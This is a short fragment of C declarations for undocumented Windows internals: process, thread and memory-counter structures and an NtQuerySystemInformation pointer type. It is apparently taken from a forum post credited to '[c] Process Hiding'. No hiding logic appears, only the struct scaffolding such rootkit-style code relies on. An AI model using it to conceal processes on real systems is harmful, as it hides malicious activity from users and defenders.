typedef struct _VM_COUNTERS { SIZE_T PeakVirtualSize; SIZE_T VirtualSize; ULONG PageFaultCount; SIZE_T PeakWorkingSetSize; SIZE_T WorkingSetSize; SIZE_T QuotaPeakPagedPoolUsage; SIZE_T QuotaPagedPoolUsage; SIZE_T QuotaPeakNonPagedPoolUsage; SIZE_T QuotaNonPagedPoolUsage; SIZE_T PagefileUsage; SIZE_T PeakPagefileUsage; } VM_COUNTERS; typedef struct _CLIENT_ID { DWORD UniqueProcess; DWORD UniqueThread; } CLIENT_ID; typedef struct _SYSTEM_THREADS { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientId; KPRIORITY Priority; KPRIORITY BasePriority; ULONG ContextSwitchCount; LONG State; LONG WaitReason; } SYSTEM_THREADS, * PSYSTEM_THREADS; typedef struct _SYSTEM_PROCESSES { ULONG NextEntryDelta; ULONG ThreadCount; ULONG Reserved1[6]; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ProcessName; KPRIORITY BasePriority; ULONG ProcessId; ULONG InheritedFromProcessId; ULONG HandleCount; ULONG Reserved2[2]; VM_COUNTERS VmCounters; IO_COUNTERS IoCounters; SYSTEM_THREADS Threads[1]; } SYSTEM_PROCESSES, *PSYSTEM_PROCESSES; typedef NTSTATUS (NTAPI *__NtQuerySystemInformation)( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength OPTIONAL ); #endif Sursa: [c] Process Hiding